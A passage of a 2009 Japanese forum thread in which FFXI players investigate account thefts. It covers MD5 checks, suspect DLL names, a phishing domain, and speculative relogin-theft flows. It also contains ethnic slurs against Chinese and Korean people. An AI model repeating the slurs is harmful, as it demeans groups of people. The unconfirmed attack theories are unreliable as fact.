61●111●58●99
をPGがブロックしてまともにページがみれないんですが
687既にその名前は使われています:2009/08/19(水) 23:19:45 ID:G8I0WssL
>>683-684
ありがとー超ご苦労様でした
スクエニ垢の複数関連づけでも同じ結果だとは思う。
>>685
次のパスに切り替わるまでは待たないといけないんだよね、確か
688既にその名前は使われています:2009/08/19(水) 23:52:04 ID:9GPkS19T
しょっくうぇーぶ(笑)入ってる時点で(ry
689既にその名前は使われています:2009/08/19(水) 23:55:49 ID:kCF1PU1i
>>686
世界的な大企業は色んなところにサーバ置いてる。
韓国台湾に置くことも結構ある。
690686:2009/08/19(水) 23:58:31 ID:8LyZC19f
>>689
やっぱそうなんか。
調べてみたらスタイルシートや画像を置いている
wwwimages.adobe.com
が問題みたい。
こいつはアカマイ管理なんでどっかの韓国サーバに飛ばされてるんだろう・・・
アカマイってどうも胡散臭いんだよなあ
691既にその名前は使われています:2009/08/20(木) 00:00:30 ID:cRAYH6O1
ハッシュまだー?
692既にその名前は使われています:2009/08/20(木) 00:01:38 ID:KKZMpAgd
アカマイが胡散臭いとか笑うところか?
693既にその名前は使われています:2009/08/20(木) 00:03:52 ID:FaeM1c5N
>>686
DNSに毒盛られてるとかで、http://get.adobe.com/ の IPアドレスおかしくなってるんじゃね?
get.adobe.com の IP は 192.150.8.45 なので、次のURL でAdobeのDLサイトにアクセスできると思われ。
ttp://192.150.8.45/jp/flashplayer/?promoid=BPCKX
がんばってー。
694既にその名前は使われています:2009/08/20(木) 00:23:38 ID:I2H5ii9C
>>679
MD5っていうのは、ファイルからその指紋みたいな、文字列を生成するものです。

1バイトでも値が違ったら、そのMD5(指紋)は変わってしまいます。
この性質を利用して、手元のフィあるが、正規なものか、改造されてるか、確認できるわけさー。
指紋照合みたいにね。

でMD5の摂り方なんだけど、
ttp://bibi.oh.land.to/delphi/software/cccs/packages/cccs014h.zip
これ落として(スキャンして)展開して、cccs.exe を起動。
MD5タブに お目当て(POL.exe)を作成(下の段)にドラッグ&ドロップ。すると、MD5が表示される。
この文字列と、感染してないPOL.exeのMD5の文字列が一致すれば、
手元のPOL.exeは改造されていないことが照明できるって、寸法。

ちなみにうちのPOL.exeのMD5はこれ。ツールなし、純正(2009年8月19日現在)
564d8a1a3d91d373b5d9e6271fb9a0aa pol.exe

同じかどうか、たしかめてみるといい。
使い方の詳細は、ココ読んでくれ。
ttp://www.forest.impress.co.jp/article/2005/12/15/cccs.html
695既にその名前は使われています:2009/08/20(木) 00:30:55 ID:I2H5ii9C
MD5 はファイルから指紋を取る何種類かあるソフトの内の一つです。
ファイルから摂られた指紋は「ハッシュ」と呼ばれます。
ファイルから「ハッシュ」を作る方法なMD5以外にも、何種類もありますが、
作成するものは全部「ハッシュ」と呼びます。
ハッシュ⊃MD5 な訳ですね。
696既にその名前は使われています:2009/08/20(木) 00:40:37 ID:5rNQZHkH
ハッシュ知らない奴が原因はwindower(キリッ
Secuniaが感染(キリリッ
697既にその名前は使われています:2009/08/20(木) 00:45:38 ID:EznskCny
RMTの値段が下がってるな
100万2200円か
栽培潰されてまた何か考え出したのかね
698既にその名前は使われています:2009/08/20(木) 00:52:29 ID:KMW96kHg
まじでwindowerがきっかけなら、もっと被害者多いんじゃね?
外人とか今はほとんどPCだし、結構使ってそうなイメージあるんだけどなあ、、。

699既にその名前は使われています:2009/08/20(木) 00:56:41 ID:5rNQZHkH
知り合いがパスとかぬすんだんじゃね
700既にその名前は使われています:2009/08/20(木) 01:00:43 ID:w6kUMCHO
>>699
垢買い・知人によるソーシャルハックの可能性も排除しきれてないんだよね
サポセンに連絡してないみたいだし
701既にその名前は使われています:2009/08/20(木) 01:02:25 ID:EznskCny
サポセンに連絡すりゃいいと思うけどな
本当に垢買いじゃないなら自分のものだということを証明して巻き戻しして貰えばいいのに
702既にその名前は使われています:2009/08/20(木) 01:03:21 ID:+44RtcJE
ここまで言われてサポセンに電話しないんだから・・・しない「理由」があるんだろう。
703既にその名前は使われています:2009/08/20(木) 01:22:37 ID:TLSt4eHi
Vistaな人用のハッシュ計算ソフト
ttp://hp.vector.co.jp/authors/VA033110/fasthash.htm
704既にその名前は使われています:2009/08/20(木) 01:27:53 ID:5rNQZHkH
何がVista用なんだ
705既にその名前は使われています:2009/08/20(木) 01:47:31 ID:45IqzGcA
ID:5rNQZHkH

昨日から一人で Windower擁護してる馬鹿がいるよwww
ハックされた奴と検証してる奴の区別もついてないらしい

>何がVista用なんだ
日本語読めてない証拠だなw
706既にその名前は使われています:2009/08/20(木) 01:51:48 ID:UJ2/kIO+
馬鹿はスルーが一番、ほっとけ
707既にその名前は使われています:2009/08/20(木) 01:53:27 ID:iv9oLb8X
あーあ、言っちゃったw
708既にその名前は使われています:2009/08/20(木) 01:55:00 ID:5rNQZHkH
>>705
どこがVistaな人用なんですか
709既にその名前は使われています:2009/08/20(木) 02:17:13 ID:eYteEzwv
Windowerが外部と通信してる事=外部にキーを送っている
みたいなレスが付いてたけど、Windowerはプラグインとかの
アップデートを自動的に探しに行く機能ついてるよな?

要するにFFXIがバーアプされても、オフセットとか手で書き換えなくても、
自動的にネットからとって、そのまま動くようになるっぽい

まぁこれがウィルスと直接関係してるかどうかは、おまいらの判断だが。
710既にその名前は使われています:2009/08/20(木) 02:17:42 ID:4pxiW4OV
垢売買で詐欺にあっただけ、っていうオチだったりね
711既にその名前は使われています:2009/08/20(木) 02:30:03 ID:TLSt4eHi
>>708
> >>705
> どこがVistaな人用なんですか

あ、すまん 上で紹介してたCCCSってハッシュ計算ソフトはVistaでも動いたw
別なハッシュソフト計算ソフトの紹介ってくらいに考えてくれ

それにしても元主のハッシュが気になる・・・
712既にその名前は使われています:2009/08/20(木) 02:51:06 ID:UJ2/kIO+
ツール使いがどうなろうと知ったことじゃないけど、むしろツールが
原因であって欲しい…って所じゃね?

ざっと読んだがWindower使ってない2垢目もハックされたってことは、
ツーラー以外もトークン利用してても被害が及ぶ実例がでたって事だからな

FlashもReaderも更新してないんじゃ、もう被害者のPCはウィルス
だらけだろうしな、実際Flashのアップデートにすら繋がらないとか…おわっとる
713既にその名前は使われています:2009/08/20(木) 03:13:15 ID:ERbvK5n2
NoScript1.9.8.4age
714既にその名前は使われています:2009/08/20(木) 04:10:39 ID:L3Yuy/8t
別にWindower経由の起動じゃなくてもPOL起動するときに自動で起動するように改変してあれば
2垢目起動したときも同じ様にウィンドウ消される可能性はあるんじゃね

ウィンドウ消される

慌てて再起動&パス入力

パスは業者の鯖へ送信→スクエニ鯖には届かず

業者即座にそのパスでログイン

ウィンドウ消しを業者側に通知すりゃ
慌ててログインしてくる奴のパスを美味しく頂くだけだし常駐の必要すらない
715既にその名前は使われています:2009/08/20(木) 05:46:43 ID:9DtgE4z/
おはげ
716既にその名前は使われています:2009/08/20(木) 06:14:26 ID:2Gik97WS
717既にその名前は使われています:2009/08/20(木) 06:19:14 ID:2Gik97WS
718既にその名前は使われています:2009/08/20(木) 06:21:08 ID:2Gik97WS
719既にその名前は使われています:2009/08/20(木) 06:26:54 ID:EznskCny
TAB
720既にその名前は使われています:2009/08/20(木) 06:44:28 ID:4e0KBumE
別スレにも書きましたが、数時間前に2垢共々ハックうけますた
その時たまたまログインしていて、突然 「このIDは別の接続先から接続があった為〜」 
とメッセージがでて強制ログアウトしました。
パス変えられてからじゃ遅いので大急ぎで、再ログインしてその状態のまま監視。
その10分後に別垢の方も同じメッセージで切断されました。
普段webサイトを見たりしないサブPCで両垢ログインして、急いでパス変更しました

FFAHは1週間前まで利用してて、シャットダウンでゲーム終了したら
いつからか終了後に必ず不正終了のエラーメッセージが出てました。
垢ハックまとめページに書いてる◇wzcsvbxm.dll ◇karnaeghDrv.dll ◇KernaeghDrv.dll
をレジストリと全ファイルから検索しましたが、確認出来ず。

オンラインスキャン終了次第、OSの再インスコします
FWとアンチウィルス入れてるから大丈夫だろう、とトークン未導入で舐めてました。
今回被害がなかったのは、奇跡だと思うので今後はセキュリティ強化に勤めます

721既にその名前は使われています:2009/08/20(木) 07:10:59 ID:JMMdVXzf
ノートン先生のLiveUpDateがエラーになるな
PeerGuardain2で韓国IPを弾いてるからも知れんが
722既にその名前は使われています:2009/08/20(木) 07:40:08 ID:+44RtcJE
ぶろがめこむtell爆撃され中age
723既にその名前は使われています:2009/08/20(木) 08:27:19 ID:TwXjz6nq
この時間帯にも爆撃されるんかage
724既にその名前は使われています:2009/08/20(木) 08:29:09 ID:ZwBwCVRr
セキュリティソフトもPG2も、誰でも手に入れられるんだから、
業者も、作った不正プログラムやウィルスが、
セキュリティソフトやPG2ではじかれないかどうかチェックしてから使うわなぁ。
725既にその名前は使われています:2009/08/20(木) 08:39:13 ID:+44RtcJE
初GM偽装tell着信記念age
726既にその名前は使われています:2009/08/20(木) 08:48:24 ID:TTje2sqK
Keycleだっけ、ハックと見せかけて個別スレ立てまでしたあげくに自演が発覚した奴。
ああいう使われ方すると非常に不愉快だから、被害者の人はきっちり報告と、それが嫌でも
せめてサポセンかチャットに連絡してハックである確認はとって欲しい。
サポセンにはアクセスログあるから、よそからのログインがあるかどうか一目で分かるし。
教えてくれるかどうかは本人確認次第だけど
727既にその名前は使われています:2009/08/20(木) 08:56:17 ID:+44RtcJE
728既にその名前は使われています:2009/08/20(木) 09:05:00 ID:4pxiW4OV
>>727
これ明らかにツールで送信してるよな
今までのももちろんそうだったけど、意味不明な改行あるし

しかしこんなアホっぽいスパムでも効果あるんだろうなあ
729既にその名前は使われています:2009/08/20(木) 09:52:48 ID:QHJr+eF5
>>720
無事でよかったね。
ウィルスは日々変化してるから、まとめサイトに書いてあるファイルがなければ安全ていうわけじゃないよ。
どの脆弱性を突かれたのか分からないけど、WindowsUpdateはもちろん、
FlashPlayerやAdobeReaderも必ず最新にね。
730既にその名前は使われています:2009/08/20(木) 10:34:43 ID:zbel7GjJ
ハッシュ待ちか。
731既にその名前は使われています:2009/08/20(木) 10:38:33 ID:n22gGSAT
ttp://tune.ache-bang.com/~vg/outitem/up/img/23721.jpg
garudaだけど偽GMのテルがきてた
席外してたから何時ごろかはしらないけどまぁ1時間以内
732既にその名前は使われています:2009/08/20(木) 10:58:04 ID:rfIwbXRS
>>731
英語版リンクシェルコミュニティを模したフィッシングサイトだね
POL-ID、POLパス、SE-ID、SEパス、ワンタイムパスを入力させて
アカウントかっぱらうと
画像はスクエニのサイトから引っ張ってる

リンクシェルコミュニティなんて要らなかったんじゃ
733既にその名前は使われています:2009/08/20(木) 11:03:11 ID:YEy/0Hs/
>>712
たぶん、最初どこの穴をつかれたか、ってところでWindowerの疑いが強いかも?
…てな話で、今までtoolの話題を避けてきたこともあったけど、
本当にセキュリティ考えるなら避けられない灰色の部分まで話題になり始めてる、ってとこかと

2台目は1台目から感染した可能性も大きい(家庭内LANなんてずずぬけだろ)し、
おいらはあんま考慮しなくて良いと思うけど
734568:2009/08/20(木) 11:30:00 ID:/NC/vNmY
>>694>>695
丁寧な説明をありがとうございます。
夜になりますが、帰宅後やってみます。

知人でFFをやっている人がいないので、身近な人がハックするということはないです。。

GMからは不正アクセス専用窓口より、報告とアカウントブロックの解除をするように
言われましたが、トークン使ってるのにハックされたのがどうしてなのかとか、
他にもされた人がいるのかを知りたかったのと、
最初のハック直後に別アカでインした時、フレもFFAHが変だったといっていたのが
すごく気になったので、こちらに書き込みました。
735既にその名前は使われています:2009/08/20(木) 11:56:24 ID:eq5y+tEr
Windower絡みだったら、NAサイトでもっと話題になってるわ。
736既にその名前は使われています:2009/08/20(木) 12:02:12 ID:Tq4aks0s
>>731
この改行もWindowerの機能の件
この手のスパムフィルタでき(ry

ハック(笑)されるものを自ら使いますかね
737既にその名前は使われています:2009/08/20(木) 12:47:13 ID:/DX5I54b
ツール云々が原因じゃなくて、単にフィッシングサイトで引っ掛かったってオチじゃないだろうなw
>>720もワンタイムとは何の関係も無いし、ワンタイム導入してて垢ハックされたってのは、このスレでは1例だけだよな?
もしwindowerのウイルス感染が原因なら、もっと被害者が多数出てもおかしくないんだよな。
誰か、ネタで書き込んでる奴いるんじゃね?
738568:2009/08/20(木) 13:22:47 ID:/NC/vNmY
>>737
本当にびっくりするような落ちだったらどうしようとか
ちょっと不安です。
739既にその名前は使われています:2009/08/20(木) 13:27:20 ID:4mPga+QF
垢ハック報告
>>568 とほぼ同じ感じでやられました。
18日の午前9時過ぎにイン、素材狩をしているときに
いきなり画面が落ち(午前11時ごろ)、その後ログイン
(トークン有)するもPOLのユーザーパスワードの認証中の
まま進まなくなったため、強制終了をする。
右上×では終わらなかったため、タスクマネジャーより切断。
再ログインを3度試すが、同様な状態なのでサポセンへ連絡。
回答は、すべて再起動して試すようにと言われ、PC、ルーター等再起動。
そのまま昼食に出かけ、午後2時前にログイン。
正常ログインするも、なぜか裸でモグハウスに。
メイン・倉庫とも、アイテム・ギルがなくなってる状態でした。
現在、垢復旧手続きを行っています。






740既にその名前は使われています:2009/08/20(木) 13:29:16 ID:oyLrbgPD
本当にwindowerがげいいん(なぜかへんry
だったら使用者が多いNAが大騒ぎしているはず!
741既にその名前は使われています:2009/08/20(木) 13:32:47 ID:ZtCjGfke
>>739
テンプレに沿っておねがいします
742既にその名前は使われています:2009/08/20(木) 13:38:16 ID:+P71o91C
トークン神話崩れたか? 中華ハッカーまじパネェな
もっと儲かる事に、その頭脳生かせよと言いたい
つーか、スクエニしょうもねえ14作ってる暇あったらセキュリティなんとかしろよ
743既にその名前は使われています:2009/08/20(木) 13:40:09 ID:ZtCjGfke
■:緊急メンテナンスを実施します
744既にその名前は使われています:2009/08/20(木) 13:42:39 ID:+44RtcJE
業者<トークン神話崩壊の噂の流布でトークン使用者減少したらウマー
745既にその名前は使われています:2009/08/20(木) 13:50:04 ID:Y3g8LQDd
>>739
そのPCで、FFXIAHとかは観たりするの?
それか、アドレスにfc2とかxreaを含むサイトとか訪れてないですか?
746既にその名前は使われています:2009/08/20(木) 13:51:33 ID:ZtCjGfke
■:ダブルトークン販売のお知らせ
747既にその名前は使われています:2009/08/20(木) 13:53:13 ID:EznskCny
>>742
スクエニ自身トークン(ワンタイムパス)は不正アクセスを完全に防げると思ってないからな


748既にその名前は使われています:2009/08/20(木) 13:55:35 ID:4mPga+QF
>>739
●不審なアドレスのクリックの有無
FF11AH / 仕事でも使用しているPCなので不明
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
No
●ID・Passの認証方法
ワンタイムパストークン使用
●Pass変更の履歴
していない
●他人が貴方のPCを使う可能性の有無(Yes/No)
No
●ツールの使用の有無
No
●ネットカフェの利用の有無:(Yes/No)
No
●使っているOS:(SP等まで書く)
XP Pro SP3
749既にその名前は使われています:2009/08/20(木) 13:56:48 ID:HfNntQd9
仕事でも使っているPCでFFだと・・・?
750既にその名前は使われています:2009/08/20(木) 13:56:55 ID:4mPga+QF
●使用ブラウザ:(バージョン等まで分かれば書く)
IE6
●WindowsUpdateの有無
2009/7/16
●FlashPlayerとRealPlayerのバージョン
不明
●アンチウイルスソフト状況:(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日 気付く前の最終検索日)
VB コーポレート 8.0
●その他のセキュリティ対策:(Spybot S&D、ルータ、ファイアウォール等)
なし
●ウイルススキャン結果:(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
問題なし
●スレログやテンプレを読んだか:(Yes/No/今から読みます)
 yes
●hosts変更:(有/無/わからない 有の場合、自分やspybotによるものか第三者によるものかどうか)
なし
●PeerGuardian2の導入:(有/無・有りの場合は参照元サイトはどこか)
なし

751既にその名前は使われています:2009/08/20(木) 13:57:01 ID:+P71o91C
って事はFFAHが原因でFAか?
752既にその名前は使われています:2009/08/20(木) 13:58:05 ID:KKZMpAgd
>>748
>●不審なアドレスのクリックの有無
>FF11AH / 仕事でも使用しているPCなので不明

無いわwwwwwwお前社外秘とか漏らしたらどうするわけw
753既にその名前は使われています:2009/08/20(木) 13:58:20 ID:ok9+eYBM
見事に「トークンあるから他気にしないでいいや」って人だな

754既にその名前は使われています:2009/08/20(木) 13:59:09 ID:KKZMpAgd
●使用ブラウザ:(バージョン等まで分かれば書く)
IE6
●WindowsUpdateの有無
2009/7/16
●FlashPlayerとRealPlayerのバージョン
不明

酷すぐるwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
755既にその名前は使われています:2009/08/20(木) 13:59:12 ID:4mPga+QF
>>739
垢復旧までは2週間程かかるそうなので
PCは入替え予定
756既にその名前は使われています:2009/08/20(木) 14:04:31 ID:4mPga+QF
>>752
業務の事は気にしなくていいですよ、当社の事なので。
このスレも、垢ハック後初めて見つけまして、
同じ現象っぽいので、報告しました。
757既にその名前は使われています:2009/08/20(木) 14:06:38 ID:KZ6/XOIV
不明の箇所穴埋めできませんかね
Flashとかさ
758既にその名前は使われています:2009/08/20(木) 14:08:20 ID:F73I5kbp
WindowsUpdateが先月で止まってるとか、FlashのVerUPが解らない(7月末に公開)の理解レベルじゃ

2人とも「FFAHの広告に配信されている【罠Flash広告】を見てFlashの脆弱性突かれた」って事でFAだろ

ただ、こうなるとトークン利用者でもFlash?なにそれ?PDF?おいしいの?って奴の間にどんどんこの
新種ウィルス広がってくって事じゃねーのかよ・・・最悪の事態だ・・・
759既にその名前は使われています:2009/08/20(木) 14:09:03 ID:KKZMpAgd
>>758
genoの件もあるから蔓延するかもなage
760既にその名前は使われています:2009/08/20(木) 14:09:45 ID:4mPga+QF
FlashのVはどこから見ればいいのですか?
761既にその名前は使われています:2009/08/20(木) 14:12:55 ID:4e0KBumE
シナ業者「トークンのせいで成果あがらないお;;、そうだ!トークン突破と嘘ついて、ねつ造で煽ってトークン利用者減らすニダ」

こういう事ですか?
762既にその名前は使われています:2009/08/20(木) 14:14:26 ID:F73I5kbp
とりあえずFlashの脆弱性ねらってたら、下のアドレスもアクセスできないかもだが
ttp://www.adobe.com/jp/products/flash/about/

現状最新版10.0.32.18
763既にその名前は使われています:2009/08/20(木) 14:15:32 ID:4mPga+QF
>>757
Flash / WIN 10,0,22,87
764既にその名前は使われています:2009/08/20(木) 14:17:00 ID:KZ6/XOIV
最新ではないようだね
765既にその名前は使われています:2009/08/20(木) 14:17:28 ID:KKZMpAgd
どうせIE使ってるんだしフラッシュ云々以前の問題だろしかも6だしw

当社の事だからとか言ってるけど顧客情報や取引先情報流出したらどうなると思って(ry
766既にその名前は使われています:2009/08/20(木) 14:18:20 ID:eq5y+tEr
このスレの存在を知っていてなおFlashが最新版じゃないってのも強気だなと思うw
767既にその名前は使われています:2009/08/20(木) 14:19:08 ID:4mPga+QF
14:30から、打合せに出かけますので
何か質問ありましたら、後ほどお答えします。
それでは。
768既にその名前は使われています:2009/08/20(木) 14:20:56 ID:F73I5kbp
とりあえず、FFのデータは巻き戻し無料)なんだからほっといてOK
会社のデータやメアド・個人情報のほうを心配したほうが良いと思うぞ
769既にその名前は使われています:2009/08/20(木) 14:21:15 ID:pTKpWrEo
>>762
ぬおっ、つながらねえええええ
770既にその名前は使われています:2009/08/20(木) 14:21:56 ID:4mPga+QF
このスレを知ったのは昨日です。
IE7以降は、アプリの関係から使えません。
XP等のVUは、PC自体を入替える様にしたため、
現状の状態保存ってことで、あえて行ってません。
ログイン自体できないし。
771既にその名前は使われています:2009/08/20(木) 14:25:09 ID:KZ6/XOIV
どういうこと
772既にその名前は使われています:2009/08/20(木) 14:26:25 ID:KKZMpAgd
ID:4mPga+QFはセキュにもコンプライアンスにも疎いようだから言っておくが世の中にはBOTってものがあってだな

遠隔であんたのPCいじってデータ流したり改ざんしたり余裕で出来るんだぜ?
どんな職種か知らないけど会社PCでそういう事してるとえらい事になるy
773既にその名前は使われています:2009/08/20(木) 14:28:19 ID:F73I5kbp
会社のPC(アンチウィルスがコーポレートエディションとか)なところを見ると
Webアプリとかを実行する関係上、VerUPを個人が行えないようにしてる所は
多いんじゃないか?
業務アプリでIE6対応のままって所は多いぞ

そんなPCのIEでFFAHを見るなよ!てかFFしちゃいかんだろうw
774既にその名前は使われています:2009/08/20(木) 14:33:12 ID:esJlND6L
トークン導入のおかげで安心感が生まれ、逆にセキュリティ意識が下がっているのか。
皮肉なもんだな。
775既にその名前は使われています:2009/08/20(木) 14:35:25 ID:L3Yuy/8t
要するに気をつけなきゃいけないのは
「いきなり画面落ち」
  ↓
「慌てて再ログイン」→この時パス抜き&スクエニ鯖へのアクセスブロック
  ↓
「アクセスブロックしてる間に盗んだパスでウマー」

こういう手口でトークン有りでも垢ハックを達成するアプリを奴らが作ったということだ
PC版の人はいきなり画面落ちしたらまず変な動きしてるものがないかタスク確認しる
776既にその名前は使われています:2009/08/20(木) 14:36:58 ID:Y3g8LQDd
公私混同とは正にこの事だな・・・
777既にその名前は使われています:2009/08/20(木) 14:38:53 ID:pTKpWrEo
adobeつながらなくて怖くなってきた。
オンラインスキャンしてこよ・・・
778既にその名前は使われています:2009/08/20(木) 15:05:56 ID:gR6Z1uUm
みんな気をつけようね保守。
779既にその名前は使われています:2009/08/20(木) 15:27:56 ID:TLSt4eHi
POL書き換えしなくても、Hostsファイル改変&キーロガー(即送信できるもの)だけでも今回の事例は説明できそうかな・・・
780既にその名前は使われています:2009/08/20(木) 15:44:02 ID:q3q01UR/
ついにワンタイムパスを強奪してきたか。
トークンによる絶対安心も短い間だったなあ…。
しばらくは散発的にハック報告入ってくるかも知れんね。

結局のところ各人のセキュリティ意識だけが最後の砦か。
781既にその名前は使われています:2009/08/20(木) 15:45:38 ID:Fhqn3vXW
トークン利用ネガキャン したい業者も居るだろうが、トークンは確実に有効

メリット
・会員情報に進むためにはもう1回新しい1passが必要
・会員情報に進めない→Passの変更は行えない
・会員情報に進めない→鯖移動されない(\3000請求は無い)
・キャラ復帰は無料で何回でも可能(トークン無しだと1回限り→2回目以後は復帰処理なし)
・モグサッチェル
・FF14でもどうせ使う
・1〜7年積み重ねてきた物が消えるよりマシだろ、いやまじで

デメリット・効果が無い点
・対垢ハックの確実な手段ではない
・セキュリティ意識の低下
・電池切れたらまた\980
・キャラ復帰の手続きの手間/日数がかかる
・垢ハック時に配送スロット・競売内のものは消失する
782既にその名前は使われています:2009/08/20(木) 15:59:47 ID:PQhWmW7+
■eが垢ハックサイトへの誘導tellすら取り締まらないこんな世の中じゃ、、。
自衛するしか「ないよなあ。

今回のような垢ハックに■eが出来る対策としては、FFのプレイボタンを押す前に、もっかいワンタイム入れるようにするくらいしか思いつかないな、、。
783既にその名前は使われています:2009/08/20(木) 16:02:44 ID:4pxiW4OV
チョンゲには鍵付き金庫あるんでしょ
FFにも欲しいよな
784既にその名前は使われています:2009/08/20(木) 16:14:21 ID:TLSt4eHi
>>782
1段階目、POLでパスワード入力して接続できずに、再度接続してパスワードを入れたときの情報を、
2段階目(例えばFF11立上げ)のパスワードに使われないようにするには・・・

POLで一回ワンタイムパスを入力したら、接続失敗しても2度目のPOLパスワード入力画面が出るまで制限時間を設定する(3分程度?)
2段階目(例えばFF11立上げ)のパスワードは、POLでのパスワード入力から上記制限時間以内に行わないとタイムアウト(2分程度?)
とかになるのかね〜 あわただしいなー(つд・)
785既にその名前は使われています:2009/08/20(木) 16:14:46 ID:q3q01UR/
さすがに業者扱いは心外w
トークンあってもセキュリティを常に意識しろと言いたかっただけ。
786既にその名前は使われています:2009/08/20(木) 16:16:24 ID:S2/2hteQ
adobeつながんねーとか言ってるヤツ、hostsファイル確認しておけ。
書き換えられてるかもしれん

XPならここ
C:\WINDOWS\system32\drivers\etc
787既にその名前は使われています:2009/08/20(木) 16:19:20 ID:pTKpWrEo
>>786
ソレかと思って自分でもみてみたんだけど、なんともなかった。
とりあえずカスペで重要な領域のみでは何も引っかからなかったんで
今は完全スキャンしてる。
788既にその名前は使われています:2009/08/20(木) 16:27:49 ID:qAhTAmPH
VB Corp Editionだと、アップデートがInternet経由ではなく、社内サーバに接続する形だから、
仮にノートPCなどで自宅に持ち帰って使用しているようなケースだと、リアルタイム性で劣る。

それと、4mPga+QFは会社にきっちりインシデント報告は上げておいた方が良いぞ。
当該PCにマルウェアが入り込んでいる可能性が決して低くない以上、スルーすることによるリスクの方が大きい。
FF11以外をターゲットとした物も入り込んでいた場合、社内アウトブレークに発展する可能性だってあり得る。
789既にその名前は使われています:2009/08/20(木) 16:29:17 ID:PQhWmW7+
生成されたワンタイムパスに制限時間をつけるのは良いな。
ジャパンネット銀行のトークンのパスは1分毎に変わるから、有効時間は1分。
■eもジャパンネット銀行と同じタイプのトークンにしとけば良かったかも。

昨日のRMTtellのギル相場は少し下がってた。
思いたくないが、これの被害者結構出てるんじゃあ、、;
790既にその名前は使われています:2009/08/20(木) 16:31:33 ID:Fhqn3vXW
>785
いや、すまん。業者扱いしてるわけじゃないんだ。
ただ、ネガキャン発言ちらほら出てきたからさ…
791既にその名前は使われています:2009/08/20(木) 16:33:24 ID:fRXztQvk
>>789
なにをどう勘違いしてるのか知らないがスクエニのワンタイムパスにも制限時間はあるぞ...
792既にその名前は使われています:2009/08/20(木) 16:35:51 ID:ERbvK5n2
1分縛りのワンパス、59秒で生成されたパスは入力された頃無効?
793既にその名前は使われています:2009/08/20(木) 16:37:46 ID:w6kUMCHO
>>568
>>720
>>739

pol.exeのサイズとMD5ハッシュを出してくれ
wMD5sumっていうソフトなら起動して枠内にドラッグするだけで分かるから
794既にその名前は使われています:2009/08/20(木) 16:42:33 ID:w6kUMCHO
あと、もし新種ならいくら既存のソフトでスキャンしても出てこないのが当たり前だぞ
カスペにせよavastにせよ、誰かが見つけて報告しない限りはいつまで経っても
発見・駆除してくれるはずがない。
だから早く原因を探らないといけないわけで
795既にその名前は使われています:2009/08/20(木) 16:45:02 ID:TLSt4eHi
>>792
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20060414/235357/
このあたりの説明を読んでおくといいかも
796既にその名前は使われています:2009/08/20(木) 17:40:58 ID:qAhTAmPH
>>731
ttp://www.adamsnames.tc/whois/?domain=playonline.tc
Domain Name playonline.tc
Registered 2009-08-15
Expiry

Registrant, Technical Contact, Admin. Contact
li bai
li bai
nanjing city yinhang6B
361004 nanjing
Jiangsu
China
Phone: +86.02028962555
Fax: +86.02068975558
Identifier: idams602g

南京市は登録住所としては珍しいような気がする。
それと、DocumentRootから辿っていったら、直接exeを落とさせるリンクもあった。VTで解析済。
ttp://www.virustotal.com/jp/analisis/c36ed85029d822113fa76b1fb5900c5ae73781e4ae222efb419332ec50b78b9d-1250610565
797既にその名前は使われています:2009/08/20(木) 17:42:30 ID:eW7YQGi/
中尉歓喜age
798既にその名前は使われています:2009/08/20(木) 18:17:33 ID:Cy7fuK39
adobe繋がるけどP2Gが61.111.58.99を弾くなw
799既にその名前は使われています:2009/08/20(木) 18:48:29 ID:f9fddcJH
素人ながら、推測してみたんですけど、
RMT業者自体も、いくつかサーバー持ってるってことですか?
こんなに短期間にいくつもころころ変わるわけだし、
RMT専用プロバイダーみたいなのもってて、
ブロックされたら、即他のとこから穴を開けることが常時可能ってことですよね?

登録住所なんて、名義貸しとか、そもそも存在する場所かどうかとかw
某国なら、かなりありえそうな話。

たとえ、某国からのアクセスをすべてスクエニが遮断したとしても、
そのうち、他の無関係な国を中継してPC騙すとか。

妄想するときりがないw
800既にその名前は使われています:2009/08/20(木) 18:49:56 ID:OYGRGo2U
>>782
FFにインするのにワンタイム認証2回にするのは多少は堅牢になるがやっぱり今回みたいなケースだと抜かれるんじゃない?

プレイ中いきなり落ちる→
プレイヤーは再ログインの為ワンパス入力→
業者は一回目のワンパスGETで一回目の認証をログイン→
プレイヤーのPOL画面には「ワンタイムパスが時間切れなのでもう一度新しいパスで入力しなおしてください」の改竄画面が→
プレイヤーは画面の内容を信じてホイホイと2回目のワンタイムパス入力してしまう→
2回目のワンパス入手で業者は2回目の認証もパスしてログイン→
キャラはアッー!状態に。

みたいな流れで。
801既にその名前は使われています:2009/08/20(木) 18:50:33 ID:3MSZAwo4
もう指紋認証でいいじゃない

あげ
802既にその名前は使われています:2009/08/20(木) 19:11:23 ID:5d1u80dt
>>799
>RMT業者自体も、いくつかサーバー持ってるってことですか?

連中は数年前から在中在米のレン鯖中心に複数のドメインを取得、
入れ替わりたちかわり実戦投入してる。基本使い捨て。
ドメイン失効直前に駆け込みのようにBBS等に大量の罠URLが書き込まれるパターンも。

>たとえ、某国からのアクセスをすべてスクエニが遮断したとしても、
>そのうち、他の無関係な国を中継してPC騙すとか。

中の国からの留学生なんかが日本国内に中継サバを用意、そこを経由する事例もある
(北九州だったかな、リネージュ関連で同様の行為を行ってた連中が逮捕されたことがあった)
昨年大陸経由のアクセスを■eが一斉に遮断したことがあったが、
一瞬だけ業者が強制ログアウトされたものの、ほんの数分後には中継サバ通して戻ってきてた
803既にその名前は使われています:2009/08/20(木) 19:13:07 ID:/DX5I54b
>>775
>こういう手口でトークン有りでも垢ハックを達成するアプリを奴らが作ったということだ
確定事項のように書いてるけど、情報源は何?
804既にその名前は使われています:2009/08/20(木) 19:14:20 ID:1G3DEueV
生体認証でも電子化された生体パスワード抜かれたらダメなんじゃない?
あとスクエニに生体データ預けるの嫌だな
上げ
805既にその名前は使われています:2009/08/20(木) 19:14:56 ID:jGumIamG
hostsファイルって書き換えられてたら更新日とかかわってたりすんの?
806既にその名前は使われています:2009/08/20(木) 19:24:29 ID:1G3DEueV
ファイルの更新日付なんか、いくらでもねつ造できるぞ
807既にその名前は使われています:2009/08/20(木) 19:50:16 ID:f9fddcJH
>>802
ありがとうございます。

思ってた以上に大掛かりなんですね。
複数の国に鯖を複数持ってる可能性もあるってことですか(汗)。
GDPの高低差とか、ネット犯罪規制が緩い国なんかである程度
鯖置く候補国とかはしぼれるかとも思ったけど、
それだと全然関係なさそうですね。

スクエニも2週間のトライアルやめたらいいのに。
14の発表があったから、ちょっと11もタダでやってみようなんていう
